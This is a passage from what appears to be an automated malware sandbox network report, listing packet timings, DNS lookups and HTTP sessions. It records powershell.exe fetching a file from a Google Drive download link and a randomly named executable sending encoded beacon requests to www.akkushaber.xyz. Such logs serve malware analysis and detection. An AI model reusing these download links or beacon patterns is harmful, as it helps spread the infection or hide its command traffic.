                                                                                                    Oct 24, 2024 08:47:59.590657949 CEST5000880192.168.2.4104.21.70.11
                                                                                                    Oct 24, 2024 08:47:59.590687990 CEST8050008104.21.70.11192.168.2.4
                                                                                                    Oct 24, 2024 08:47:59.590698957 CEST8050008104.21.70.11192.168.2.4
                                                                                                    Oct 24, 2024 08:47:59.590744019 CEST5000880192.168.2.4104.21.70.11
                                                                                                    Oct 24, 2024 08:47:59.635257959 CEST8050008104.21.70.11192.168.2.4
                                                                                                    Oct 24, 2024 08:47:59.635301113 CEST8050008104.21.70.11192.168.2.4
                                                                                                    Oct 24, 2024 08:47:59.635318995 CEST8050008104.21.70.11192.168.2.4
                                                                                                    Oct 24, 2024 08:47:59.635521889 CEST5000880192.168.2.4104.21.70.11
                                                                                                    Oct 24, 2024 08:47:59.710303068 CEST8050008104.21.70.11192.168.2.4
                                                                                                    Oct 24, 2024 08:47:59.710433006 CEST8050008104.21.70.11192.168.2.4
                                                                                                    Oct 24, 2024 08:47:59.710468054 CEST8050008104.21.70.11192.168.2.4
                                                                                                    Oct 24, 2024 08:47:59.710501909 CEST8050008104.21.70.11192.168.2.4
                                                                                                    Oct 24, 2024 08:47:59.710601091 CEST8050008104.21.70.11192.168.2.4
                                                                                                    Oct 24, 2024 08:47:59.710612059 CEST5000880192.168.2.4104.21.70.11
                                                                                                    Oct 24, 2024 08:47:59.710612059 CEST5000880192.168.2.4104.21.70.11
                                                                                                    Oct 24, 2024 08:47:59.710638046 CEST8050008104.21.70.11192.168.2.4
                                                                                                    Oct 24, 2024 08:47:59.710679054 CEST5000880192.168.2.4104.21.70.11
                                                                                                    Oct 24, 2024 08:47:59.710736990 CEST8050008104.21.70.11192.168.2.4
                                                                                                    Oct 24, 2024 08:47:59.710949898 CEST8050008104.21.70.11192.168.2.4
                                                                                                    Oct 24, 2024 08:47:59.710983992 CEST8050008104.21.70.11192.168.2.4
                                                                                                    Oct 24, 2024 08:47:59.710999012 CEST5000880192.168.2.4104.21.70.11
                                                                                                    Oct 24, 2024 08:47:59.711082935 CEST8050008104.21.70.11192.168.2.4
                                                                                                    Oct 24, 2024 08:47:59.711132050 CEST5000880192.168.2.4104.21.70.11
                                                                                                    Oct 24, 2024 08:47:59.711245060 CEST8050008104.21.70.11192.168.2.4
                                                                                                    Oct 24, 2024 08:47:59.711424112 CEST8050008104.21.70.11192.168.2.4
                                                                                                    Oct 24, 2024 08:47:59.711453915 CEST8050008104.21.70.11192.168.2.4
                                                                                                    Oct 24, 2024 08:47:59.711472034 CEST5000880192.168.2.4104.21.70.11
                                                                                                    Oct 24, 2024 08:47:59.711581945 CEST8050008104.21.70.11192.168.2.4
                                                                                                    Oct 24, 2024 08:47:59.711616039 CEST8050008104.21.70.11192.168.2.4
                                                                                                    Oct 24, 2024 08:47:59.711627960 CEST5000880192.168.2.4104.21.70.11
                                                                                                    Oct 24, 2024 08:47:59.711651087 CEST8050008104.21.70.11192.168.2.4
                                                                                                    Oct 24, 2024 08:47:59.711694956 CEST5000880192.168.2.4104.21.70.11
                                                                                                    Oct 24, 2024 08:47:59.711920977 CEST8050008104.21.70.11192.168.2.4
                                                                                                    Oct 24, 2024 08:47:59.711956024 CEST8050008104.21.70.11192.168.2.4
                                                                                                    Oct 24, 2024 08:47:59.711999893 CEST5000880192.168.2.4104.21.70.11
                                                                                                    Oct 24, 2024 08:47:59.712222099 CEST8050008104.21.70.11192.168.2.4
                                                                                                    Oct 24, 2024 08:47:59.712395906 CEST8050008104.21.70.11192.168.2.4
                                                                                                    Oct 24, 2024 08:47:59.712444067 CEST5000880192.168.2.4104.21.70.11
                                                                                                    Oct 24, 2024 08:47:59.712580919 CEST8050008104.21.70.11192.168.2.4
                                                                                                    Oct 24, 2024 08:47:59.712615013 CEST8050008104.21.70.11192.168.2.4
                                                                                                    Oct 24, 2024 08:47:59.712657928 CEST5000880192.168.2.4104.21.70.11
                                                                                                    Oct 24, 2024 08:47:59.712737083 CEST8050008104.21.70.11192.168.2.4
                                                                                                    Oct 24, 2024 08:47:59.712769985 CEST8050008104.21.70.11192.168.2.4
                                                                                                    Oct 24, 2024 08:47:59.712804079 CEST8050008104.21.70.11192.168.2.4
                                                                                                    Oct 24, 2024 08:47:59.712816954 CEST5000880192.168.2.4104.21.70.11
                                                                                                    Oct 24, 2024 08:47:59.713327885 CEST8050008104.21.70.11192.168.2.4
                                                                                                    Oct 24, 2024 08:47:59.713376999 CEST5000880192.168.2.4104.21.70.11
                                                                                                    Oct 24, 2024 08:47:59.713464022 CEST8050008104.21.70.11192.168.2.4
                                                                                                    Oct 24, 2024 08:47:59.713515043 CEST8050008104.21.70.11192.168.2.4
                                                                                                    Oct 24, 2024 08:47:59.713557005 CEST5000880192.168.2.4104.21.70.11
                                                                                                    Oct 24, 2024 08:47:59.713807106 CEST8050008104.21.70.11192.168.2.4
                                                                                                    Oct 24, 2024 08:47:59.713840961 CEST8050008104.21.70.11192.168.2.4
                                                                                                    Oct 24, 2024 08:47:59.713874102 CEST8050008104.21.70.11192.168.2.4
                                                                                                    Oct 24, 2024 08:47:59.713886023 CEST5000880192.168.2.4104.21.70.11
                                                                                                    Oct 24, 2024 08:47:59.713907957 CEST8050008104.21.70.11192.168.2.4
                                                                                                    Oct 24, 2024 08:47:59.713949919 CEST5000880192.168.2.4104.21.70.11
                                                                                                    Oct 24, 2024 08:47:59.714476109 CEST8050008104.21.70.11192.168.2.4
                                                                                                    Oct 24, 2024 08:47:59.714509010 CEST8050008104.21.70.11192.168.2.4
                                                                                                    Oct 24, 2024 08:47:59.714543104 CEST8050008104.21.70.11192.168.2.4
                                                                                                    Oct 24, 2024 08:47:59.714557886 CEST5000880192.168.2.4104.21.70.11
                                                                                                    Oct 24, 2024 08:47:59.714793921 CEST8050008104.21.70.11192.168.2.4
                                                                                                    Oct 24, 2024 08:47:59.714827061 CEST8050008104.21.70.11192.168.2.4
                                                                                                    Oct 24, 2024 08:47:59.714844942 CEST5000880192.168.2.4104.21.70.11
                                                                                                    Oct 24, 2024 08:47:59.714860916 CEST8050008104.21.70.11192.168.2.4
                                                                                                    Oct 24, 2024 08:47:59.714895010 CEST8050008104.21.70.11192.168.2.4
                                                                                                    Oct 24, 2024 08:47:59.714911938 CEST5000880192.168.2.4104.21.70.11
                                                                                                    Oct 24, 2024 08:47:59.715627909 CEST8050008104.21.70.11192.168.2.4
                                                                                                    Oct 24, 2024 08:47:59.715662956 CEST8050008104.21.70.11192.168.2.4
                                                                                                    Oct 24, 2024 08:47:59.715691090 CEST5000880192.168.2.4104.21.70.11
                                                                                                    Oct 24, 2024 08:47:59.715713978 CEST8050008104.21.70.11192.168.2.4
                                                                                                    Oct 24, 2024 08:47:59.715759993 CEST5000880192.168.2.4104.21.70.11
                                                                                                    Oct 24, 2024 08:47:59.715785980 CEST8050008104.21.70.11192.168.2.4
                                                                                                    Oct 24, 2024 08:47:59.715838909 CEST8050008104.21.70.11192.168.2.4
                                                                                                    Oct 24, 2024 08:47:59.715886116 CEST5000880192.168.2.4104.21.70.11
                                                                                                    Oct 24, 2024 08:47:59.716123104 CEST8050008104.21.70.11192.168.2.4
                                                                                                    Oct 24, 2024 08:47:59.754539967 CEST8050008104.21.70.11192.168.2.4
                                                                                                    Oct 24, 2024 08:47:59.754636049 CEST8050008104.21.70.11192.168.2.4
                                                                                                    Oct 24, 2024 08:47:59.754671097 CEST8050008104.21.70.11192.168.2.4
                                                                                                    Oct 24, 2024 08:47:59.754712105 CEST8050008104.21.70.11192.168.2.4
                                                                                                    Oct 24, 2024 08:47:59.754745960 CEST8050008104.21.70.11192.168.2.4
                                                                                                    Oct 24, 2024 08:47:59.754791975 CEST5000880192.168.2.4104.21.70.11
                                                                                                    Oct 24, 2024 08:47:59.754791975 CEST5000880192.168.2.4104.21.70.11
                                                                                                    Oct 24, 2024 08:47:59.758302927 CEST5000880192.168.2.4104.21.70.11
                                                                                                    Oct 24, 2024 08:47:59.826175928 CEST8050008104.21.70.11192.168.2.4
                                                                                                    Oct 24, 2024 08:47:59.826196909 CEST8050008104.21.70.11192.168.2.4
                                                                                                    Oct 24, 2024 08:47:59.826257944 CEST5000880192.168.2.4104.21.70.11
                                                                                                    Oct 24, 2024 08:47:59.826270103 CEST8050008104.21.70.11192.168.2.4
                                                                                                    Oct 24, 2024 08:47:59.826286077 CEST8050008104.21.70.11192.168.2.4
                                                                                                    Oct 24, 2024 08:47:59.826323032 CEST5000880192.168.2.4104.21.70.11
                                                                                                    Oct 24, 2024 08:47:59.826442957 CEST8050008104.21.70.11192.168.2.4
                                                                                                    Oct 24, 2024 08:47:59.826457977 CEST8050008104.21.70.11192.168.2.4
                                                                                                    Oct 24, 2024 08:47:59.826500893 CEST5000880192.168.2.4104.21.70.11
                                                                                                    Oct 24, 2024 08:47:59.826601982 CEST8050008104.21.70.11192.168.2.4
                                                                                                    Oct 24, 2024 08:47:59.826616049 CEST8050008104.21.70.11192.168.2.4
                                                                                                    Oct 24, 2024 08:47:59.826651096 CEST5000880192.168.2.4104.21.70.11
                                                                                                    Oct 24, 2024 08:47:59.826909065 CEST8050008104.21.70.11192.168.2.4
                                                                                                    Oct 24, 2024 08:47:59.826921940 CEST8050008104.21.70.11192.168.2.4
                                                                                                    Oct 24, 2024 08:47:59.826962948 CEST5000880192.168.2.4104.21.70.11
                                                                                                    Oct 24, 2024 08:47:59.827239990 CEST8050008104.21.70.11192.168.2.4
                                                                                                    Oct 24, 2024 08:47:59.827255964 CEST8050008104.21.70.11192.168.2.4
                                                                                                    Oct 24, 2024 08:47:59.827270031 CEST8050008104.21.70.11192.168.2.4
                                                                                                    Oct 24, 2024 08:47:59.827294111 CEST5000880192.168.2.4104.21.70.11
                                                                                                    Oct 24, 2024 08:47:59.827567101 CEST8050008104.21.70.11192.168.2.4
                                                                                                    Oct 24, 2024 08:47:59.827580929 CEST8050008104.21.70.11192.168.2.4
                                                                                                    Oct 24, 2024 08:47:59.827609062 CEST5000880192.168.2.4104.21.70.11
                                                                                                    Oct 24, 2024 08:47:59.827744007 CEST8050008104.21.70.11192.168.2.4
                                                                                                    Oct 24, 2024 08:47:59.827779055 CEST5000880192.168.2.4104.21.70.11
                                                                                                    Oct 24, 2024 08:47:59.827939034 CEST8050008104.21.70.11192.168.2.4
                                                                                                    Oct 24, 2024 08:47:59.827951908 CEST8050008104.21.70.11192.168.2.4
                                                                                                    Oct 24, 2024 08:47:59.827987909 CEST5000880192.168.2.4104.21.70.11
                                                                                                    Oct 24, 2024 08:47:59.828113079 CEST8050008104.21.70.11192.168.2.4
                                                                                                    Oct 24, 2024 08:47:59.828125954 CEST8050008104.21.70.11192.168.2.4
                                                                                                    Oct 24, 2024 08:47:59.828138113 CEST8050008104.21.70.11192.168.2.4
                                                                                                    Oct 24, 2024 08:47:59.828167915 CEST5000880192.168.2.4104.21.70.11
                                                                                                    Oct 24, 2024 08:47:59.828409910 CEST8050008104.21.70.11192.168.2.4
                                                                                                    Oct 24, 2024 08:47:59.828459024 CEST5000880192.168.2.4104.21.70.11
                                                                                                    Oct 24, 2024 08:47:59.828563929 CEST8050008104.21.70.11192.168.2.4
                                                                                                    Oct 24, 2024 08:47:59.828577995 CEST8050008104.21.70.11192.168.2.4
                                                                                                    Oct 24, 2024 08:47:59.828614950 CEST5000880192.168.2.4104.21.70.11
                                                                                                    Oct 24, 2024 08:47:59.828916073 CEST8050008104.21.70.11192.168.2.4
                                                                                                    Oct 24, 2024 08:47:59.828929901 CEST8050008104.21.70.11192.168.2.4
                                                                                                    Oct 24, 2024 08:47:59.828942060 CEST8050008104.21.70.11192.168.2.4
                                                                                                    Oct 24, 2024 08:47:59.828953981 CEST8050008104.21.70.11192.168.2.4
                                                                                                    Oct 24, 2024 08:47:59.828963041 CEST5000880192.168.2.4104.21.70.11
                                                                                                    Oct 24, 2024 08:47:59.828993082 CEST5000880192.168.2.4104.21.70.11
                                                                                                    Oct 24, 2024 08:47:59.829144001 CEST8050008104.21.70.11192.168.2.4
                                                                                                    Oct 24, 2024 08:47:59.829440117 CEST8050008104.21.70.11192.168.2.4
                                                                                                    Oct 24, 2024 08:47:59.829452038 CEST8050008104.21.70.11192.168.2.4
                                                                                                    Oct 24, 2024 08:47:59.829473019 CEST5000880192.168.2.4104.21.70.11
                                                                                                    Oct 24, 2024 08:47:59.829622984 CEST8050008104.21.70.11192.168.2.4
                                                                                                    Oct 24, 2024 08:47:59.829658985 CEST5000880192.168.2.4104.21.70.11
                                                                                                    Oct 24, 2024 08:47:59.829813004 CEST8050008104.21.70.11192.168.2.4
                                                                                                    Oct 24, 2024 08:47:59.829824924 CEST8050008104.21.70.11192.168.2.4
                                                                                                    Oct 24, 2024 08:47:59.829838037 CEST8050008104.21.70.11192.168.2.4
                                                                                                    Oct 24, 2024 08:47:59.829854012 CEST8050008104.21.70.11192.168.2.4
                                                                                                    Oct 24, 2024 08:47:59.829859018 CEST5000880192.168.2.4104.21.70.11
                                                                                                    Oct 24, 2024 08:47:59.829890966 CEST5000880192.168.2.4104.21.70.11
                                                                                                    Oct 24, 2024 08:48:00.107830048 CEST5000880192.168.2.4104.21.70.11
                                                                                                    Oct 24, 2024 08:48:00.112668037 CEST5000880192.168.2.4104.21.70.11
                                                                                                    Oct 24, 2024 08:48:00.118067026 CEST8050008104.21.70.11192.168.2.4
                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                    Oct 24, 2024 08:46:05.149646044 CEST6420553192.168.2.41.1.1.1
                                                                                                    Oct 24, 2024 08:46:05.156832933 CEST53642051.1.1.1192.168.2.4
                                                                                                    Oct 24, 2024 08:46:06.549245119 CEST5691553192.168.2.41.1.1.1
                                                                                                    Oct 24, 2024 08:46:06.557303905 CEST53569151.1.1.1192.168.2.4
                                                                                                    Oct 24, 2024 08:46:44.487484932 CEST5325553192.168.2.41.1.1.1
                                                                                                    Oct 24, 2024 08:46:44.494827032 CEST53532551.1.1.1192.168.2.4
                                                                                                    Oct 24, 2024 08:47:58.570952892 CEST6269053192.168.2.41.1.1.1
                                                                                                    Oct 24, 2024 08:47:58.586241961 CEST53626901.1.1.1192.168.2.4
                                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                    Oct 24, 2024 08:46:05.149646044 CEST192.168.2.41.1.1.10x708fStandard query (0)drive.google.comA (IP address)IN (0x0001)false
                                                                                                    Oct 24, 2024 08:46:06.549245119 CEST192.168.2.41.1.1.10xfcbaStandard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false
                                                                                                    Oct 24, 2024 08:46:44.487484932 CEST192.168.2.41.1.1.10x432dStandard query (0)drive.google.comA (IP address)IN (0x0001)false
                                                                                                    Oct 24, 2024 08:47:58.570952892 CEST192.168.2.41.1.1.10x8646Standard query (0)www.akkushaber.xyzA (IP address)IN (0x0001)false
                                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                    Oct 24, 2024 08:46:05.156832933 CEST1.1.1.1192.168.2.40x708fNo error (0)drive.google.com142.250.185.78A (IP address)IN (0x0001)false
                                                                                                    Oct 24, 2024 08:46:06.557303905 CEST1.1.1.1192.168.2.40xfcbaNo error (0)drive.usercontent.google.com142.250.186.97A (IP address)IN (0x0001)false
                                                                                                    Oct 24, 2024 08:46:44.494827032 CEST1.1.1.1192.168.2.40x432dNo error (0)drive.google.com142.250.185.142A (IP address)IN (0x0001)false
                                                                                                    Oct 24, 2024 08:47:58.586241961 CEST1.1.1.1192.168.2.40x8646No error (0)www.akkushaber.xyz104.21.70.11A (IP address)IN (0x0001)false
                                                                                                    Oct 24, 2024 08:47:58.586241961 CEST1.1.1.1192.168.2.40x8646No error (0)www.akkushaber.xyz172.67.217.176A (IP address)IN (0x0001)false
                                                                                                    • drive.google.com
                                                                                                    • drive.usercontent.google.com
                                                                                                    • www.akkushaber.xyz
                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    0192.168.2.450008104.21.70.11802448C:\Program Files (x86)\RrGCLFamdOMILBfgTztXLHLeIGrTaHIvUdtkIGyLvRBOMtpbECrSjHJgx\nJPhzxOixucOn.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Oct 24, 2024 08:47:58.610075951 CEST594OUTGET /0mzg/?eBn8=2O13gIliMn3YsUw5a3KzRkO18CQjk9KHJ2ezAhJRRaOqIrVzHHZDa9+gXbVcJvld3ors0lI+gPWWM5QB07s0EfgV3tv6nKYxZWLGcFl7cPul4bAwfY0iYcg=&lvf=o4BpH HTTP/1.1
                                                                                                    Host: www.akkushaber.xyz
                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                    Connection: close
                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; openframe/30.0.0.6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                    Oct 24, 2024 08:47:59.467901945 CEST1236INHTTP/1.1 404 Not Found
                                                                                                    Date: Thu, 24 Oct 2024 06:47:59 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: close
                                                                                                    vary: Accept-Encoding
                                                                                                    cf-cache-status: DYNAMIC
                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RgNokXVGELP9%2BfLzpB99hN%2FKnyoWQIdOprmy2PD3sDhw3nfDUnXvCJSjXtircE68iYmgTl6qxO64%2FRILu1uT%2FCvUfalpRK9%2F%2B5pUDW71xy%2FPjdixl6dKAmYgaG74wJbHt3rl9Nw%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                    Server: cloudflare
                                                                                                    CF-RAY: 8d7804c2aabf486a-DFW
                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1122&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=594&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                    Data Raw: 37 64 33 39 0d 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 74 72 22 20 61 6d 70 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 30 33 37 39 63 34 22 3e 0a 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 61 6b 61 72 79 61 65 73 63 6f 72 74 68 61 62 65 72 2e 70 72 6f 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 32 30 32 34 2f 31 30 2f 63 72 6f 70 70 65 64 2d 61 73 6c 61 6e 61 61 2d 33 32 78 33 32 2e 6a 70 65 [TRUNCATED]
                                                                                                    Data Ascii: 7d39<!DOCTYPE html><html lang="tr" amp><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width,minimum-scale=1,maximum-scale=1,initial-scale=1"> <meta name="theme-color" content="#0379c4"><link rel="icon" href="https://sakaryaescorthaber.pro/wp-content/uploads/2024/10/cropped-aslanaa-32x32.jpeg" sizes="32x32"><link rel="icon" href="https://sakaryaescorthaber.pro/wp-content/uploads/2024/10/croppe
                                                                                                    Oct 24, 2024 08:47:59.468028069 CEST1236INData Raw: 64 2d 61 73 6c 61 6e 61 61 2d 31 39 32 78 31 39 32 2e 6a 70 65 67 22 20 73 69 7a 65 73 3d 22 31 39 32 78 31 39 32 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a
                                                                                                    Data Ascii: d-aslanaa-192x192.jpeg" sizes="192x192"><link rel="apple-touch-icon" href="https://sakaryaescorthaber.pro/wp-content/uploads/2024/10/cropped-aslanaa-180x180.jpeg"><meta name="msapplication-TileImage" content="https://sakaryaescorthaber.pro/w
                                                                                                    Oct 24, 2024 08:47:59.468063116 CEST1236INData Raw: 66 6f 6f 74 65 72 2c 68 65 61 64 65 72 2c 6d 61 69 6e 2c 6d 65 6e 75 2c 6e 61 76 2c 73 65 63 74 69 6f 6e 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 7d 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 65 6d 3b 6d 61 72 67 69 6e 3a 2e 36 37 65 6d 20 30 7d
                                                                                                    Data Ascii: footer,header,main,menu,nav,section{display:block}h1{font-size:2em;margin:.67em 0}figure{margin:1em 40px}hr{box-sizing:content-box;height:0}code,kbd,pre,samp{font-family:monospace,monospace;font-size:1em}a{background-color:transparent;-webkit-
                                                                                                    Oct 24, 2024 08:47:59.468282938 CEST1236INData Raw: 64 69 6e 67 3a 2e 33 35 65 6d 20 2e 36 32 35 65 6d 20 2e 37 35 65 6d 7d 6c 65 67 65 6e 64 7b 63 6f 6c 6f 72 3a 69 6e 68 65 72 69 74 3b 64 69 73 70 6c 61 79 3a 74 61 62 6c 65 3b 6d 61 78 2d 77 69 64 74 68 3a 31 30 30 25 3b 77 68 69 74 65 2d 73 70
                                                                                                    Data Ascii: ding:.35em .625em .75em}legend{color:inherit;display:table;max-width:100%;white-space:normal}textarea{overflow:auto}[type=number]::-webkit-inner-spin-button,[type=number]::-webkit-outer-spin-button{height:auto}[type=search]{-webkit-appearance:
                                                                                                    Oct 24, 2024 08:47:59.468329906 CEST848INData Raw: 65 69 67 68 74 3a 35 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 35 7d 62 6c 6f 63 6b 71 75 6f 74 65 7b 62 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64 20 23 65 32 65 32 65 32 3b 62 6f 72 64 65 72 2d 77 69 64 74 68 3a 31 70 78 20 30 3b 70
                                                                                                    Data Ascii: eight:500;line-height:1.5}blockquote{border:1px solid #e2e2e2;border-width:1px 0;padding:15px 15px 15px 60px;text-align:left;position:relative;clear:both}blockquote p:last-child{margin-bottom:0}blockquote:before{content:"\f10e";font:normal nor
                                                                                                    Oct 24, 2024 08:47:59.468513012 CEST1236INData Raw: 35 70 78 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 35 70 78 3b 2d 77 65 62 6b 69 74 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65 3a 63 6f 76 65 72 3b 2d 6d 6f 7a 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65 3a 63 6f 76 65 72 3b 2d 6f
                                                                                                    Data Ascii: 5px;margin-bottom:15px;-webkit-background-size:cover;-moz-background-size:cover;-o-background-size:cover;background-size:cover}.img-holder:before{display:block;content:" ";width:100%;padding-top:70%}.content-holder{position:absolute;bottom:16p
                                                                                                    Oct 24, 2024 08:47:59.468548059 CEST1236INData Raw: 73 65 3b 2d 6d 6f 7a 2d 74 72 61 6e 73 69 74 69 6f 6e 3a 61 6c 6c 20 2e 36 73 20 65 61 73 65 3b 2d 6f 2d 74 72 61 6e 73 69 74 69 6f 6e 3a 61 6c 6c 20 2e 36 73 20 65 61 73 65 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 61 6c 6c 20 2e 36 73 20 65 61 73 65
                                                                                                    Data Ascii: se;-moz-transition:all .6s ease;-o-transition:all .6s ease;transition:all .6s ease}.site-header .navbar-search:hover,.site-header .navbar-toggle:hover{background:rgba(0,0,0,.1)}.site-header .navbar-search:focus,.site-header .navbar-toggle:focu
                                                                                                    Oct 24, 2024 08:47:59.468584061 CEST1236INData Raw: 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 62 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 2e 30 38 29 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 33 33 70 78 3b 6c 69 6e 65 2d 68 65 69
                                                                                                    Data Ascii: ;display:inline-block;border:1px solid rgba(0,0,0,.08);border-radius:33px;line-height:26px;font-size:12px;font-weight:400}.better-amp-main-link a .fa{margin-right:5px}.carousel{overflow:hidden}.carousel .carousel-item,.carousel .img-holder{wid
                                                                                                    Oct 24, 2024 08:47:59.468617916 CEST636INData Raw: 63 6f 6e 74 65 6e 74 3a 27 20 27 3b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 7d 2e 63 6f 6d 6d 65 6e 74 20 2e 63 6f 6d 6d 65 6e 74 2d 61 76 61 74 61 72 20 69 6d 67 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 35 30 25 7d 2e 63 6f 6d 6d 65 6e 74 20
                                                                                                    Data Ascii: content:' ';display:block}.comment .comment-avatar img{border-radius:50%}.comment .column-1{float:left;width:55px}.comment .column-2{padding-left:75px}.comment .comment-content{color:#838383;margin-top:8px;line-height:1.57;font-size:14px}.comm
                                                                                                    Oct 24, 2024 08:47:59.468653917 CEST1236INData Raw: 6f 64 65 20 2e 73 65 63 74 69 6f 6e 2d 68 65 61 64 69 6e 67 7b 6d 61 72 67 69 6e 3a 30 20 30 20 31 33 70 78 7d 2e 62 73 2d 73 68 6f 72 74 63 6f 64 65 20 2e 73 65 63 74 69 6f 6e 2d 68 65 61 64 69 6e 67 20 2e 6f 74 68 65 72 2d 6c 69 6e 6b 7b 64 69
                                                                                                    Data Ascii: ode .section-heading{margin:0 0 13px}.bs-shortcode .section-heading .other-link{display:none}.entry-content table{border:1px solid #ddd;margin-bottom:30px;width:100%}.btn{display:inline-block;margin-bottom:0;font-weight:400;text-align:center;v
                                                                                                    Oct 24, 2024 08:47:59.473607063 CEST1236INData Raw: 65 62 61 72 20 2e 63 6c 6f 73 65 2d 73 69 64 65 62 61 72 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 62 6f 72 64 65 72 3a 6e 6f 6e 65 3b 63 6f 6c 6f 72 3a 23 66 66 66 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 74 6f 70 3a 31 30
                                                                                                    Data Ascii: ebar .close-sidebar{font-size:16px;border:none;color:#fff;position:absolute;top:10px;right:10px;background:0 0;width:32px;height:32px;line-height:32px;text-align:center;padding:0;outline:0;-webkit-transition:all .6s ease;-moz-transition:all .6


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    0192.168.2.449730142.250.185.784436044C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2024-10-24 06:46:06 UTC215OUTGET /uc?export=download&id=1q6CY4oUtcou-aVhA3_vUUUrfOOBqCrd8 HTTP/1.1
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                    Host: drive.google.com
                                                                                                    Connection: Keep-Alive
                                                                                                    2024-10-24 06:46:06 UTC1610INHTTP/1.1 303 See Other
                                                                                                    Content-Type: application/binary
                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                    Pragma: no-cache
                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                    Date: Thu, 24 Oct 2024 06:46:06 GMT
                                                                                                    Location: https://drive.usercontent.google.com/download?id=1q6CY4oUtcou-aVhA3_vUUUrfOOBqCrd8&export=download
                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                    Content-Security-Policy: script-src 'nonce-T6oPPlXCwDItx6KGzM4Zdg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
